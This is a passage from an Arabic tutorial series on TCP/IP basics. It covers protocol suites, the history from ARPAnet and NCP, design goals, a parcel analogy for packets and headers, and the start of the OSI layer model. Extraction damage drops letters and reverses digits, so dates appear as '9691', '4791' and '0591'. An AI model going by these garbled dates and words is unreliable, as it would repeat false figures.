,‬السريعة ‪,‬القابلة للتطور ‪ ,‬ويعتبر‪ ‬‬ ‫مجموعة كفء من البروتوكولت‪ .‬‬ ‫حزمة البروتوكول ‪Protocol stack‬ھذه ھ ي بروتوكول النترنت الشائع المستعمل‬ ‫الن‪ .‬‬ ‫نسبة لن تبادل المعلومات اصبح اكثر اتساعا ‪ ,‬كثیر من الفراد والشركات‪ ‬‬ ‫سیحتاجون الي فھم ال‪ TCP IP .‬‬ ‫ماھو ال‪ TCP/ IP :‬‬ ‫‪TCP/IP‬ھو مجموعة من البروتوكولت التي تمكن الكمبیوترات من التصال‪ .‬‬ ‫في الحالة العادية وعندما ل تحتاج الكمبیوترات الي ان تتصل ببعضھا ل توجد‪ ‬‬ ‫حوجة نھائیا الي بروتوكولت متفق علیھا بین الجھزة‪ .‬‬ ‫ولكن عندما تتصل الكمبیوترات ببعضھا في شبكة تظھ ر الحوجة الي برتوكولت‪ ‬‬ ‫يتفق علیھا‪ .‬‬ ‫يستطیع الیوم مدير اي شبكة كمبیوترات ان يختار من اكثر من بروتوكول ولكن‪ ‬‬ ‫بروتوكول ال ‪TCP/ IP‬ھ و الكثر استخداما ‪ .‬جزء من السبب ھو ببساطة ان‪ ‬‬ ‫ال ‪TCP IP‬ھو الذي تستعمله اكبر شبكة في العالم ال ‪INTERNET .‬اذا اردت‪ ‬‬ ‫ان يتصل جھ ازك مع النترنت يجب ان تستخدم ال‪ TCP/ IP .‬‬ ‫عندما تعمل مجموعة من البروتوكولت مع بعضھا فان المجموعة بشكل‪ ‬‬ ‫جماعي تعرف ب‪ Potocol Suite OR Protocol Stack .‬‬ ‫ال ‪ TCP/ IP‬مثال ل حزمة البروتوكول او ) ‪ Protocol Suite‬وصف ل مجموعة من‬ ‫البروتوكولت التي تعمل مع بعضھا‪ ( .‬‬ ‫يطلق علي ‪ TCP/ IP‬مصطلح ‪ Protocol suite‬او ‪ Protocol Stack‬وكل‪ ‬‬ ‫المصطلحین يستخدمان بصورة متبادلة اي يعطیان نفس المعني رغم انھما‪ ‬‬ ‫يختلفان بعض الشئ‪ .‬‬ ‫سبب اخر ل شھرة ال ‪ TCP IP‬ھو انه يتوافق تقريبا مع اي كمبیوتر في العالم ‪.‬‬ ‫‪ TCP/ IP stack‬مدعوم من كل اصدارات انظمة التشغیل الكبري وانظمة تشغیل‬


‫الشبكات وتشمل ‪ : Windows 95\98 , Windows NT, Windows 0002,‬‬ ‫‪ . Windows XP, Windows 2003 , Linux , Unix ,Netware‬‬ ‫‪TCP/ IP‬تسمي ايضا لغة النترنت‪ .‬‬ ‫‪ 58‬‬ ‫وھي ايضا لغة لكثیر من الشبكات الصغیرة‪ .‬‬ ‫كل الكمبیوترات التي يلحق بھ ا النترنت لكي تتصل بفاعلیة يجب ان يتفقوا‪ ‬‬ ‫علي لغة ‪ .‬مثلھا مثل اي لغة بشر لھا قواعد حتي يستطیع الناس الذين‪ ‬‬ ‫يشتركون في المحادثة ان يفھ وا ماذا يقول الخرون‪ .‬‬ ‫لغة الكمبیوتر تحتاج الي مجموعة من القواعد حتي تستطیع الكمبیوترات ان‪ ‬‬ ‫تتصل بفاعلیة ‪ .‬وبعض قواعد اللغة التي تستخدمھا الكمبیوترات للتصال‪ ‬‬ ‫تشتمل علي متي يتم ارسال البیانات ومتي يتم استقبالھا ‪ .‬‬ ‫‪ -1‬ممیزات ال‪ TCP IP :‬‬ ‫‪TCP/IP‬مستخدم لكثر من ‪ 02‬عاما‪ .‬‬ ‫‪ TCP/IP‬له كثیر من الممیزات والفوائد ‪ .‬وسندرس في ھذا القسم اكثرھا‪ ‬‬ ‫اھمیة‪ .‬‬ ‫‪ -1‬قابلیة التشغیل المتبادل‪ :‬‬ ‫واحد من اكبر السباب التي جعلت ال ‪ TCP/IP suite‬يكتسب شعبیة وقبول‪ ‬‬ ‫عالمي ھ و انه يمكن تركیبه واستعماله بصورة عملیة علي اي نظام تشغیل ‪ .‬‬ ‫باستخدام ‪ TCP/IP‬يستطیع خادم ‪ Unix‬ان يتصل ويرسل البیانات الي خادم‪ ‬‬ ‫‪DOS‬او خادم‪ Windows .‬‬ ‫الخادم ھو اسم اخر للكمبیوتر او الجھاز علي الشبكة ‪ .‬‬ ‫ويمكن ان نقول ان ‪ TCP/IP‬الغي التضارب في التطبیقات المختلفة‪ .‬‬ ‫‪ -2‬المرونة‪ :‬‬ ‫‪ TCP/IP‬كتلة بروتوكول مرن جدا ‪ ,‬في الدروس القادمة سنعرف بعض الممیزات‬ ‫التي ادت الي ھذه المرونة‪ .‬‬ ‫مثال لمرونة ‪ TCP/IP‬يتضمن ازالة المشقة التي يواجھھا المدير ‪Administrator‬‬ ‫في تخصیص واعادة تخصیص العناوين ‪ Addresses .‬‬ ‫‪ -3‬سھولة الحركة‪ :‬‬ ‫واحدة من قیود اكثر البروتوكولت ھي صعوبة نقل البیانات من احد قطاعات‪ ‬‬ ‫‪ 68‬‬ ‫الشبكة الي قطاع اخر‪ .‬‬ ‫‪ TCP/IP stack‬مصمم بصورة استثنائیة لینقل البیانات من اي قطاع في الشبكة‬ ‫الي القطاع الخر او من اي خادم في شبكة في جزء من العالم الي اي خادم‪ ‬‬ ‫اخر في شبكة في مكان اخر من العالم‪ .‬‬ ‫‪ 78‬‬ ‫بروتوكول ‪) TCP/IP‬الجزء الثاني)‪ ‬‬ ‫للكاتب‪ AgainstISR&USA :‬‬ ‫ھذا الدرس يھ دف بصفة خاصة الي التركیز علي نقطة ھامة وھي ان يستوعب‬ ‫الدارس ما الذي يدرسه وما حقیقته وھو اساس‪ ‬‬ ‫مھم لتكون الدروس علي اساس افكار مسبقة قام علیھا موضوع الدراسة حتي‬ ‫ما يجي واحد يقول في النھاية ماھي قصة ال‪ ‬‬ ‫‪TCP/IP‬ولماذا جاءت وھیك اسئلة وھي مرحب بھا ايضا ولكن لعامل الزمن‪ ‬‬ ‫نحب نتجاوزھا مسبقا ‪ ..‬وھذا تمھید للدخول الي الدرس الدسم ‪ ..‬‬ ‫والشغل الثقیل قااادم ‪ ..‬ارجو لكم التوفیق‪ ..‬‬ ‫‪ -3‬اصل النترنت‪ :‬‬ ‫فھ م جذور واساسیات النترنت سیفتح بصیرتك امام تطور ‪ TCP/IP‬وكثیر من‪ ‬‬ ‫قواعده ومعايیره ‪ .‬‬ ‫اذا عرفنا لماذا انشئ ال ‪ TCP/IP ,‬وكیف تطور ‪ ,‬يمكننا بسھولة ان نفھم ال‪ ‬‬ ‫‪ . TCP/IP protocol suite‬‬ ‫اصل انترنت الیوم ھو ‪ ARPAnet ,‬وھ ي شبكة قوية انشئت بواسطة وكالة‪ ‬‬


‫ابحاث المشاريع المتطورة ‪ – Advanced Research Projects Agency - -‬‬ ‫اختصارا ( ‪ ( ARPA‬واطلقت في العام ‪ . 9691‬وھي تابعة لوزارة الدفاع المیركیة‬ ‫وتم انشاءھا في نھاية ‪ . 0591‬‬ ‫انشئت ھذه الشبكة لتكون مسئولة بصفة خاصة عن التھديد المحتمل من‪ ‬‬ ‫الھ جوم النووي من قبل التحاد السوفییتي‪ .‬‬ ‫واحدة من اھداف ‪ ARPA‬الساسیة ھي انشاء شبكة اساسیة تسمح لقادة‪ ‬‬ ‫القوات المیركیة بان يبقوا علي اتصال دائم في حالة وقوع الحرب النووية‪ .‬‬ ‫‪ARPA‬بدات مھمتھا بانشاء شبكة بما يبدو وكانھا متطلبات مستحیلة‪ .‬‬ ‫اللغة او البروتوكول الذي يستخدم في ‪ ARPAnet‬كان يسمي ‪ Network‬‬ ‫‪ 88‬‬ ‫‪ . ) Control Protocol ( NCP‬‬ ‫مع نمو ‪ ARPAnet‬ظھ رت الحوجة الي بروتوكول جديد لن ‪ NCP‬ببساطة ل‪ ‬‬ ‫يغطي كل احتیاجات الشبكة الكبیرة ‪ .‬‬ ‫يمكننا ان نشبه ال ‪ NCP‬بلغة انسانیة ل تحتوي ال علي كلمات قلیلة ‪ .‬اللغة‪ ‬‬ ‫يمكن ان تمكن قلیل من الناس للتصال ببعضھ م ‪ ,‬ولكن اذا دخل المزيد من‪ ‬‬ ‫البشر الذين يريدون ان يتحدثوا في كثیر من المواضیع يجب ان تطور لغة‪ ‬‬ ‫التخاطب‪ .‬‬ ‫اذا ‪ NCP‬لھ ا الكثیر من العیوب ولیست بالقوة الكافیة لشبكة قوية بدات في‪ ‬‬ ‫النمو خارج عن السیطرة‪ .‬‬ ‫عیوب ال ‪ NCP‬ونمو ‪ ARPAnet‬قادا الي البحث عن تطوير لغة شبكة جديدة‪ .‬‬ ‫‪ -4‬میلد ال‪ TCP/IP :‬‬ ‫في ‪ 4791‬اطلق اثنان من رواد النترنت ‪ A Protocol for Packet Network‬‬ ‫‪Interconnection .‬وھي ورقة تصف ال ) ‪ Transmission Control Protocol‬‬ ‫( ‪TCP‬وھو بروتوكول في ال ‪ Protocol suite‬وسیحل في النھاية محل‪ NCP .‬‬ ‫وكما سندرس في الحلقات الدراسیة القادمة ‪ TCP‬مسؤول من التاكد ان‪ ‬‬ ‫البیانات وصلت الي الكمبیوتر الخر ‪ .‬‬ ‫في ‪ 8791‬الختبار والتطوير المتزايد لھذه اللغة قاد الي حزمة جديدة من‪ ‬‬ ‫البروتوكولت سمیت ) ‪ Transmission Control Protocol/Internet Protocol‬‬ ‫‪ . ) TCP/IP‬‬ ‫في ‪ 2891‬قرر بان يستبدل ‪ NCP‬بال ‪ TCP/IP‬ك لغة اساسیة ل‪ ARPAnet .‬‬ ‫في ‪ ARPAnet 0991‬ازيلت من الوجود ‪ .‬النترنت من ذلك الحین نمت من جذور‬ ‫ال ‪ ARPAnet ,‬وطور ال ‪ TCP/IP‬لیقابل متطلبات التغیر للنترنت ‪ .‬‬ ‫‪ -5‬اھداف تصمیم ال‪ TCP/IP :‬‬ ‫‪ TCP/IP‬تطور الي وضعیته الحالیة ‪ ,‬والبروتوكولت الداخلة في ‪ TCP/IP suite‬تم‬ ‫اختبارھا و تعديلھا وتطويرھا مع الوقت ‪ . TCP/IP protocol suite‬له عدة اھداف‬ ‫‪ 98‬‬ ‫تصمیم لیكون بروتوكول فعال ل شبكة كبیرة ومتطورة‪ .‬‬ ‫بعض من ھذه الھداف يشمل‪ :‬‬ ‫‪ -1‬الستقللیة عن نوع الجھزة‪ :‬‬ ‫حزمة بروتوكول يمكن استخدامھا علي ال ‪Mac ,PC, mainframe,‬او اي جھاز‪ ‬‬ ‫كمبیوتر‪ .‬‬ ‫‪ -2‬الستقللیة عن نوع البرمجة‪ :‬‬ ‫حزمة بروتوكول يمكن ان يستخدمھ ا مختلف مصنعي البرمجیات والتطبیقات ‪ .‬‬ ‫وھذا يسمح لجھاز في موقع بالتصال بجھ از في موقع اخر بدون ان يكون فیھما‪ ‬‬ ‫نفس البرنامج‪ .‬‬ ‫‪ -3‬اصلح الخطا والقدرة علي حمل نسب خطا عالیة‪ :‬‬ ‫حزمة البروتوكول متمیزة ب اصلح اوتوماتیكي لي بیانات ساقطة او مفقودة ‪ .‬‬ ‫ھ ذا البروتوكول يستطیع اصلح اي انقطاع من اي جھ از في اي جزء من الشبكة‬ ‫وفي اي نقطة في البیانات المرسلة‪ .‬‬ ‫‪ -4‬نظام كفؤ بتحمیل اقل‪ :‬‬


‫حزمة البروتوكول تحمل كمیة قلیلة من البیانات الضافیة المتحركة مع البیانات‪ ‬‬ ‫المرسلة ‪ .‬ھ ذه البیانات القلیلة تسمي التحمیل الزائد ‪ .‬التحمیل الزائد‪ ‬‬ ‫‪Overhead‬يشبه ظرف استخدم ل ارسال رسالة ‪ ,‬او صندوق استخدم لرسال‬ ‫اشیاء كبیرة وملت باكثر من حمولتھا العادية‪ .‬‬ ‫‪ -5‬القدرة علي اضافة شبكات علي الشبكة الداخلیة بدون عرقلة الخدمة او‪ ‬‬ ‫اسقاط الشبكة الداخلیة‪ .‬‬ ‫‪ -6‬حزمة البروتوكول التي فیھا البیانات يمكن ان تشق طريقھا خلل شبكة‪ ‬‬ ‫الكمبیوترات الداخلیة الي اي اتجاه محتمل ‪ .‬لیكون ھذا ممكنا مخطط عنونة‪ ‬‬ ‫وحید وذو مغزي يجب ان يستعمل لذلك اي كمبیوتر يحرك البیانات يمكنه ان‪ ‬‬ ‫يحسب افضل طريق ل كل قطعة بیانات كما تتحرك داخل الشبكة‪ .‬‬ ‫‪TCP/IP‬تم تطويره لیقابل ھذه الھداف ‪ ,‬وخلل دراستنا سنعرف ھل غطي‪ ‬‬ ‫بالفعل اھ داف تصمیمه ام ل‪ .‬‬ ‫مصطلحات ھ امــــــــــــــــة‪ :‬‬ ‫‪ Protocols‬‬ ‫مجموعة من القواعد والمعايیر التي تحكم التصالت‪ .‬‬ ‫‪ 09‬‬ ‫‪ Network administrator‬‬ ‫الشخص الذي يركب ويراقب ويحل مشاكل الشبكة‪ .‬‬ ‫‪ Host‬‬ ‫اي جھاز مثل ( ‪( workstation , server, mainframe, printer‬في شبكة او‬ ‫شبكة داخلیة فیھا عنوان‪ TCP/IP .‬‬ ‫‪ ARPAnet‬‬ ‫شبكة وكالة ابحاث المشاريع المتطورة ‪ ,‬سلف النترنت ‪ .‬‬ ‫‪ Network Control Protocol NCP‬‬ ‫البروتوكول المستخدم قبل‪ TCP/IP .‬‬ ‫‪ Transmission Control Protocol (TCP‬‬ ‫البروتوكول الذي يصف التصال بین الجھزة‪ .‬‬ ‫‪ Transmission Control Protocol/ Internet Protocol( TCP/IP‬‬ ‫حزمة من البروتوكولت اشتركت لتكون لغة النترنت‪ .‬‬ ‫‪ 19‬‬ ‫بروتوكول ‪) TCP/IP‬الجزء الثالث)‪ ‬‬ ‫للكاتب‪ AgainstISR&USA :‬‬ ‫ما ھي البروتوكولت‪ :‬‬ ‫البروتوكول ھو قاعدة او مجموعة من القواعد والمعايیر للتصال تستخدمھا‪ ‬‬ ‫الكمبیوترات عندما ترسل البیانات ذھابا وايابا‪ .‬‬ ‫كل الراسل والمستقبل المشتركان في البیانات المرسلة يجب ان يعترفوا‪ ‬‬ ‫بنفس البروتوكولت‪ .‬‬ ‫لتبادل البیانات ‪ ,‬الكمبیوترات المرسلة والمستقبلة ‪ ,‬وتسمي ايضا ‪ Hosts ,‬‬ ‫يجب ان يوافقا علي شكل البیانات‪ .‬عندما يرسل ‪ Host‬الي ‪ Host‬اخر كل باقة‪ ‬‬ ‫ال ‪s 1‬وال ‪s 0‬كلھما يجب ان يوافقا علي معني وطريقةالتنسیب لي ‪ 1‬و ‪ . 0‬‬ ‫جزء من المعلومات التي ترسل تمثل العناوين وجزء يمثل البیانات‪ .‬‬ ‫كل ‪ HOST‬له عنوان خاص ‪ ,‬مثلما لبیتكم عنوان خاص في شارعكم ‪ .‬وتشبه‪ ‬‬ ‫ايضا خطابات البريد التي ترسل الي عنوانك ‪ .‬البیانات التي تسلم الي ال ‪Host‬‬ ‫المناسب تعتمد علي عنوانه ‪ .‬ال ‪ Host‬التي ترسل المعلومات يجب ان تفھم‪ ‬‬ ‫كیف تجد العنوان الصحیح بین البیانات ‪ Data‬لكي تستطیع البیانات ان تجد‪ ‬‬ ‫طريقھا الي وجھتھا‪ .‬‬ ‫كما ذكرنا سابقا عندما تبدا الكبیوترات في التصال ‪ ,‬يجب اول ان يتفقوا علي‪ ‬‬ ‫بروتوكول لیستخدموه ‪ .‬‬ ‫مجموعة البروتوكولت تسمي ‪ protocol suite‬او ‪ protocol stack .‬عناوين‪ ‬‬ ‫البروتوكول الواحد لھا اصدار خاص يساعدھ ا في التصال ‪ .‬عندما ندمج‪ ‬‬


‫البروتوكول مع بروتوكولت اخري ‪ ,‬مجموع البروتوكولت الناتجة تسمي ‪protocol‬‬ ‫‪suite . TCP/IP‬كمثال ھو ‪ protocol suite .‬في كمبیوتر متصل مع الشبكة ‪ ,‬‬ ‫البرنامج الذي يجمع البیانات للرسال يسمي ‪ protocol stack .‬عندما الكمبیوتر‬ ‫البیانات ‪ ,‬فانھ ا تتحرك من خلل ال‪ protocol stack .‬‬ ‫ھ ناك الكثیر من البروتوكولت المستخدمة الیوم ‪ .‬بعضا منھا بروتوكولت مملوكة‪ ‬‬ ‫‪ 29‬‬ ‫ذات استخدام خاص ‪ .‬طورت لھداف محددة لتقابل حاجات خاصة لبعض ال‪ ‬‬ ‫‪software‬او‪ hardware .‬‬ ‫واحدة من اشھر ال ‪ protocol suites‬الیوم في اتصالت الشبكات تشمل‪ :‬‬ ‫‪ : 1/ IPX/SPX‬‬ ‫ھو ‪ protocol suite‬قامت بتصمیمه شركة ‪ Novell‬واستخدمته في انظمة‪ ‬‬ ‫تشغیلھا‪ .‬‬ ‫‪IPX/SPX‬اختصار ل ‪ Internetwork Packet Exchange / Sequenced Packet‬‬ ‫‪ Exchange‬‬ ‫‪ : 2/ Apple Talk‬‬ ‫ھو ‪ protocol suite‬قامت بتصمیمه شركة ‪ Apple‬واستخدمته في انظمة‪ ‬‬ ‫تشغیلھا ‪ .‬‬ ‫‪ : 3/ TCP/IP‬‬ ‫ھو ‪ protocol suite‬واصبح معیار النترنت ‪ .‬يعني اي واحد يريد ان يستخدم‪ ‬‬ ‫النترنت لزم يستخدم بروتوكول ال‪ TCP/IP suite .‬‬ ‫طیب ندخل في العمق شوية‪ ..‬‬ ‫البروتوكولت تحرك حزم البیانات ‪ :‬‬ ‫عندما ترسل البیانات من ‪ Host‬الي اخر يقوم بروتوكول ‪ TCP/IP‬بتقسیمھا الي‬ ‫قطع تسھل ادارتھا وھذه القطع تسمي ‪ packets‬الرزم او الحزم‪ .‬‬ ‫البروتوكول يحدد كیف سیكون شكل وعنوان ال ‪ packets .‬ال ‪ packets‬مثل‪ ‬‬ ‫الصناديق تستخدم لشحن ال ‪ Data‬او البیانات‪ .‬‬ ‫كل ‪ packet‬مرفق معھا ‪ headers‬وھي معلومات الحزمة التي ترفق معھا‪ ‬‬ ‫للدللة علیھ ا ‪ .‬والتي تجعل من الممكن اعادة تجمیع ال ‪ Packets‬واخذ البیانات‬ ‫الصلیة في وجھة البیانات ‪ .‬‬ ‫ال ‪ Headers‬او معلومات الحزمة يرفق مع حزمة البیانات لنفس السبب الذي‪ ‬‬ ‫يلصق لجله الديباجة علي الطرد المرسل عبر البريد الي شخص اخر ‪ .‬‬ ‫‪ 39‬‬ ‫الكمبیوتر الذي يرسل البیانات الي كمبیوتر اخر ھو مثلي عندما ارسل طرد الي‪ ‬‬ ‫انسان اخر ‪ .‬‬ ‫سنضرب مثا ل عملي يوضح المسالة‪ :‬‬ ‫اذا انا عاوز ارسل دراجة لبن اختي في مدينة اخري ‪ .‬الدراجة تمثل عندنا‪ ‬‬ ‫البیانات التي نريد ان نرسلھ ا الي كمبیوتر اخر ‪ .‬لرسل الدراجة يجب ان اتبع‪ ‬‬ ‫قواعد وبروتوكولت معینة حتي تصل الدراجة‪ .‬‬ ‫‪ -1‬اضع الدراجة في طرد او عدة طرود اذا كانت ل يمكن ان توضع علي طرد‪ ‬‬ ‫واحد ‪ ,‬في ھ ذا المثال الطرد يمثل ال ‪ packets .‬‬ ‫‪ -2‬وضعنا الدراجة داخل الطرود ‪ ,‬الخطوة التالیة ھي وضع عنوان علي الطرود ‪ .‬‬ ‫ولكن ھ ناك بروتوكولت وقوانین لوضع العناوين علي الطرود ‪ :‬يجب ان استخدم‪ ‬‬ ‫اسم اختي الصحیح وكذلك عنوانھ ا الصحیح ‪ .‬عنوان الديباجة يجب ان يحتوي‪ ‬‬ ‫علي اجزاء المعلومات الضرورية حتي تصل الطرود الي وجھتھا الصحیحة مثل ‪ ,‬‬ ‫عنوان الشارع ‪ ,‬المدينة ‪ ,‬المحافظة او القلیم ‪ ,‬مفتاح المدينة ‪ .‬وھذا يشبه‪ ‬‬ ‫تماما ‪ TCP/IP‬عندما يضع معلومات الحزمة ‪ Headers‬علي حزمة البیانات‪ ‬‬ ‫‪packets‬التي سترسل‪ .‬‬ ‫‪ -3‬كذلك نضع عنوان المرسل علي الديباجة وھذا يشبه ايضا حزمة البیانات‪ ‬‬ ‫التي تحتوي علي معلومات المصدر المرسلة منه ‪ .‬‬ ‫‪-4‬ھناك مكان محدد لكل معلومات العنونة ھذه ويجب ان امل البیانات لكل طرد‪ ‬‬


‫وال لن تصل الي وجھتھا ‪ .‬‬ ‫‪ -5‬اخیرا اشیر الي اي واحد من الطرود مطلوب ان يفتح بالكتابة علیھا ( ‪1‬من ‪)5‬‬ ‫(‪2‬من ‪( 5‬الخ ‪. ..‬وھذا يساعد اختي لتعرف اي طرد تفتح الول ‪ ,‬ثم الثاني ‪ ,‬الخ‪ ‬‬ ‫‪ ..‬فتستطیع بسھولة اعادة تجمیع الدراجة ‪ .‬‬ ‫‪-6‬عندما تكون الطرود جاھزة ‪ ,‬محتاج ان اقرر اي نوع خدمة استلم اريد ان‪ ‬‬ ‫استعمل وصیغ ديباجات الطرود تعتمد علي خدمة الرسائل او نوع الشركة التي‪ ‬‬ ‫اخترتھ ا مثل ‪ :‬اذا اخترت ال ‪ DHL‬ح اضع الطرود في صناديق ال ‪ DHL ,‬اذا‪ ‬‬ ‫اخترت ال ‪ ARAMEX EXPRESS‬بالتاكید ح اضع صناديقي في الرامكس وھكذا ‪ .‬‬ ‫نفس الشي يحدث في عالم الكمبیوتر يتم تغلیف ال ‪ packets‬ب ‪ format‬او‪ ‬‬ ‫صیغ تكون مناسبة للشبكة الفیزيائیة الموجود داخلھا الكمبیوتر المرسل ‪ .‬اذا‪ ‬‬ ‫‪ 49‬‬ ‫كان الكمبیوتر علي ‪ Ethernet network‬او شبكة ‪ Ethernet‬الحزم يجب ان تكون‬ ‫علي الصیغة المناسبة للنتقال عبر ال ‪ Ethernet work .‬اذا كانت الحزم علي‪ ‬‬ ‫‪Token Ring network‬او شبكة ‪ Token Ring‬الحزم مفروض تكون علي صیغ‪ ‬‬ ‫‪ . Token Ring‬‬ ‫‪ -7‬الن وصلنا الي مرحلة التسلیم ‪ ,‬اتصلت برجل البريد لیاتي وياخذ الطرود‪ ‬‬ ‫ولكن ل انا ول ھ و سیكون من سلم الطرد !!! لماذا اذن ‪ ..‬سنعرف الن ‪ ..‬‬ ‫البیانات المكتوبة بالصیغة المناسبة في نظام نقل متحرك من ماكن الي اخر‪ ,‬‬ ‫الطرود يحتمل ان تاخذ طرق مختلفة لكنھا في النھاية ستصل الي نفس‪ ‬‬ ‫الوجھة ‪ .‬سیتم تسلیمھم الي عنوانھم اعتمادا علي العنوان الذي وضعته علي‬ ‫الديباجات ‪ .‬بنفس الفھم اذا كانت ھ ناك مشكلة الشركة ستخبرني لني‪ ‬‬ ‫وضعت عنوان المرسل علي الطرود‪ .‬‬ ‫‪ -8‬بعد ان تصل الطرود الي اختي ستفتحھم ‪ ,‬وتستطیع ان تعید تجمیع الدراجة‬ ‫بناء علي المعلومات التي علي الديباجات ‪ .‬بالمثل الكمبیوتر المستقبل لحزم‪ ‬‬ ‫البیانات يمكن ان يجمع البیانات بناء علي المعلومات المرفقة مع الحزم وھي ال‬ ‫‪ . Headers‬‬ ‫‪ -9‬اخیرا سترمي صناديق الطرود بعد ان تاخذ المعلومات التي تريدھا من‪ ‬‬ ‫الديباجات ‪ ,‬والذي تريده حقیقة ھو الدراجة والصناديق كل مھمتھا ان توصل‪ ‬‬ ‫الدراجة الي وجھتھ ا الصحیحة اذن لحوجة للصناديق بعد نھاية مھمتھا ‪ .‬نفس‪ ‬‬ ‫الفكرة تستخدم عندما نستخدم ال ‪ TCP/IP‬لكي نرسل البیانات ‪ ,‬الحزم تكون‪ ‬‬ ‫مبنیة علي معلومات مرفقة معھ ا ‪ ,‬وتنبذ بعد ان تستخدم المعلومات الھامة‪ ‬‬ ‫المرفقة وتم تسلیم البیانات المطلوبة الي البرنامج الذي طلبھا ‪ .‬‬ ‫الصورة ادناه تصف كمبیوتر احمد وھ و يرسل بیانات الي كمبیوتر سارة ‪ .‬لحظ ان‬ ‫البیانات تم تجزيئھا الي عدة حزم يحتوي كل منھا علي رقم متسلسل ‪ .‬في‪ ‬‬ ‫الكمبیوتر المستقبل سارة تعید تجمیع البیانات مرة اخري الي صیغة غیر مجزاة‬ ‫‪ .‬يعني تتجمع في صورتھا الصلیة التي ارسلت بھا‪ .‬‬ ‫‪ 59‬‬ ‫مصطلحات ھ امــــــــــــــــــة‪ :‬‬ ‫‪ protocol suite‬‬ ‫مجموعة من البروتوكولت‪ ‬‬ ‫‪ protocol stack‬‬ ‫مجموعة بروتوكولت ترسل وتستقبل البیانات‪ ‬‬ ‫‪ Headers‬‬ ‫معلومات صغیرة تكون مرفقة مع الحزم وتحتوي دائما علي العنوان ومعلومات‬ ‫مسار البیانات‪ ‬‬ ‫‪ 69‬‬ ‫بروتوكول ‪) TCP/IP‬الجزء الرابع)‪ ‬‬ ‫للكاتب‪ AgainstISR&USA :‬‬ ‫النموذج القیاسي للشبكات‪ ‬‬ ‫‪ Open System Interconnection‬‬


‫‪ .::::.::::OSI‬‬ ‫عند الرغبة في انشاء شبكة لتبادل المعلومات والبیانات فانه لبد من ان تكون‪ ‬‬ ‫الجھ زة متوافقة في طريقة التصال الشبكي‪ .‬‬ ‫لذلك في عام ‪ 7791‬المنظمة الدولیة للمقايیس ‪ ( ISO ) International‬‬ ‫‪Organization for Standardization‬تبنت نموذج ال ‪ Open System‬‬ ‫‪ . ) Interconnection (OSI‬‬ ‫ويتك ّن نموذج ‪ OSI‬من سبع طبقات ُتیح للدارس فھم مختلف الوظائف‪ ‬‬ ‫و‪ ‬‬ ‫ت‬ ‫والعملیات في الشبكة‪ ،‬والھم من ذلك أن ھذا النموذج ُشكل ُنی ً لفھم آلیة‬ ‫ي‪ ‬‬ ‫بة‬ ‫انتقال المعلومات في الشبكة‪ ،‬إضافة إلى إمكان استخدامه لتمثیل آلیة انتقال‬ ‫المعلومات ( ‪ (information‬أو ُ َم البیانات (‪ (data packets‬من البرامج‪ ‬‬ ‫حز‪ ‬‬ ‫التطبیقیة (مثل‪ :‬برامج الجداول اللكترونیة أو برامج معالجة الكلمات) عبر وسط‬ ‫النقل في الشبكة (مثل‪ :‬السلك‪ ‬‬ ‫(( ‪ (wires‬إلى برنامج تطبیقي على كمبیوتر آخر على شبكة ما‪ ،‬حتى إن‪ ‬‬ ‫اختلف نوع شبكة ال ُرسل عن نوع شبكة ال ُستقبل ‪ .‬‬ ‫م‪ ‬‬ ‫م‬ ‫يمكننا تعريف الھدف من انشاء ال ‪ OSI‬بانه يستخدم لتقسیم المھام الكثیرة‪ ‬‬ ‫التي يتطلبھ ا نقل البیانات من كمبیوتر الي اخر ‪.‬الي خطوات صغیرة‪ .‬‬ ‫ھذه الخطوات الصغیر ة تسمي ال ‪ layers‬او الطبقات ‪ ,‬وال ‪ OSI‬يتكون من‪ ‬‬ ‫سبعة طبقات‪ .‬‬ ‫لكل طبقة مسئوولیاتھا الخاصة بھا‪ .‬‬ ‫الطبقات السبعة ھي‪ :‬‬ ‫‪ 1/ Application‬‬ ‫‪ 2 / Presentation‬‬ ‫‪ 3/ Session‬‬ ‫‪ 79‬‬ ‫‪ 4/ Transport‬‬ ‫‪ 5/ Network‬‬ ‫‪ 6/ Data­link‬‬ ‫‪ 7/ Physical‬‬ ‫نموذج ال ‪ OSI‬ھو طريقة التقسیم لنواع البیانات المتصلة بطريقة تساعد‪ ‬‬ ‫‪Network Administrator‬مدير الشبكة في معالجة مشاكل الشبكة‪ .‬‬ ‫مسئولیة كل طبقة‪ :‬‬ ‫في اثناء مرور البیانات علي الطبقات السبعة في الشبكة ‪ ,‬كل طبقة تضع‪ ‬‬ ‫معلومات بسیطة تسمي ‪ Header‬علي الحزمة ‪ .‬‬ ‫طیب الن ح نلقي نظرة سريعة علي مھمة كل تطبیق‪ :‬‬ ‫‪ 1/ The Application Layer‬‬ ‫طبقة التطبیق او البرنامج‪ :‬‬ ‫اعلي طبقة في نموذج ال ‪ OSI‬الھدف من طبقة التطبیق ھو ادارة التصالت‪ ‬‬ ‫بین التطبیقات ‪ .‬تطبیقات او برامج طبقة التطبیق ھ ي برامج معیارية او قیاسیة‪ ‬‬ ‫تتفاعل مع البرنامج الجاري في الشبكة ‪ .‬لتفسیر ذلك عندك المبرمج اللي‪ ‬‬ ‫كتب برنامج ‪ Word‬كتبه بحیث يتفاعل مع البرامج القیاسیة الموجودة في طبقة‬ ‫التطبیق ‪ .‬برنامج ‪ Word‬يستخدم برامج الشبكة القیاسیة لیقوم ب ‪ save ,‬‬ ‫‪copy , delete‬للمجلدات والمستندات‪ .‬‬ ‫طبقة التطبیق ھي التي تستقبل فیھا البرامج البیانات وتطلبھا ايضا ‪ .‬‬ ‫كل الطبقات الخري تعمل لھذه الطبقة‪ .‬‬ ‫‪ 2/ The Presentation Layer‬‬ ‫طبقة التقديم‪ :‬‬


‫طبقة التقديم تلي طبقة التطبیق مباشرة واعلي طبقة الجلسة‪ .‬‬ ‫طبقة التقديم تضیف ھیكل لحزم البیانات التي يتم تبادلھا‪ .‬‬ ‫مھمة طبقة التقديم الرئیسیة ھي التاكد من الرسالة التي ارسلت بلغة او رمز‬ ‫‪ 89‬‬ ‫يستطیع الكمبیوتر المستقبل ان يفھمھا ‪ ً .‬‬ ‫البروتوكولت في طبقة التقديم يحتمل تقوم بترجمة البیانات الي رموز مفھومة‪ ‬‬ ‫بعد ذلك تضغطھا ويحتمل تشفیرھا قبل ان ترسل الي طبقة ‪ Session‬او‪ ‬‬ ‫الجلسة التي تلیھا‪ .‬‬ ‫‪ 3/ The Session Layer‬‬ ‫طبقة الجلسة‪ :‬‬ ‫تلي طبقة التقديم ‪ .‬تتحكم في الحوار اثناء التصالت ‪ .‬وتدير الجلسات بین‪ ‬‬ ‫الطراف المتصلة ‪ .‬بروتوكولتھ ا تغطي مواضیع مثل كیفیة انشاء 